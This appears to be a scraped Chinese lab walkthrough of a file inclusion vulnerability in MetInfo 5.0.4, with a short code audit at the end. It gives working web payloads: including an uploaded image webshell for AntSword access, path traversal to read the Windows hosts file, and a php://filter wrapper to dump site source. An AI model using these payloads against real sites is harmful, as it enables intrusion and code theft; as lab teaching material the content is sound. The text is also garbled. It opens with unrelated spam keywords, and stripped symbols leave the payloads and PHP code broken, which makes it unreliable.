做机械的有什么网站,自己在线制作logo免费网站,长春电商网站建设,南宁平面设计公司文章目录 安装环境启动环境漏洞花式利用蚁剑连接图片马读取敏感文件#xff08;hosts#xff09;读取该网站的php源码 代码审计 安装环境
安装phpstudy#xff0c;下载MetInfo 5.0.4版本软件#xff0c;复制到phpstudy目录下的www目录中。
打开phpstudy#xff0c;访问浏… 文章目录 安装环境启动环境漏洞花式利用蚁剑连接图片马读取敏感文件hosts读取该网站的php源码 代码审计 安装环境
安装phpstudy下载MetInfo 5.0.4版本软件复制到phpstudy目录下的www目录中。
打开phpstudy访问浏览器127.0.0.1/MetInfo5.0.4/install/index.php打开Meinfo 5.0.4主页点击下一步、下一步到数据库设置中配置数据库信息数据库名设为met1密码设为root 填写管理员设置设置用户名密码设为root手机号码和电子邮箱随便填写 点击保存设置后显示安装完成
启动环境
安装成功后打开网页
漏洞花式利用
漏洞原理 在MetInfo软件的127.0.0.1/MetInfo5.0/about/index.php 页面存在文件包含漏洞在这里上传文件可以利用这个漏洞 蚁剑连接图片马
访问漏洞点127.0.0.1/MetInfo5.0/about/index.php页面用fmodule和module参数上传图片马
?fmodule7module../upload/file/muma.gif上传成功后用hackbar尝试输入打开发现一堆乱码但是打开成功 打开蚁剑输入上面的地址测试连接成功连接成功获取webshell 读取敏感文件hosts
用相对路径读取hosts文件
?fmodule7module../../../../../../windows/system32/drivers/etc/hosts如图读取成功 用绝对路径读取hosts文件
?fmodule7modulec:/windows/system32/drivers/etc/hosts读取成功
读取该网站的php源码
?fmodule7modulephp://filter/readconvert.base64-encode/resourceshow.php得到base64的源码密文 利用工具进行解码得到网站的源码 代码审计
查看C:\phpStudy\WWW\MetInfo5.0.4\include目录下的module.php文件从第119行看找到下面代码
if($fmodule!7){if($mdle100)$mdle3;if($mdle101)$mdle5;$module $modulefname[$mdle][$mdtp];if($moduleNULL){okinfo(../404.html);exit();}if($mdle2||$mdle3||$mdle4||$mdle5||$mdle6){if($fmodule$mdle){$module $modulefname[$mdle][$mdtp];}else{okinfo(../404.html);exit();}}else{if($list){okinfo(../404.html);exit();}else{$module $modulefname[$mdle][$mdtp];}}if($mdle8){if(!$id)$id$class1;$module ../feedback/index.php;}
}这段代码的if语句中如果fmodule不等于7就会给module做初始化等于7不会做初始化。
而在C:\phpStudy\WWW\MetInfo5.0.4\about下的index.php文件中
有下面代码
?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
$filpy basename(dirname(__FILE__));
$fmodule1;
require_once ../include/module.php;
require_once $module;
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?module是前面没有赋值的参数require_once做module的文件包含如果fmodule7而module没有赋值页面的回显就会空白。
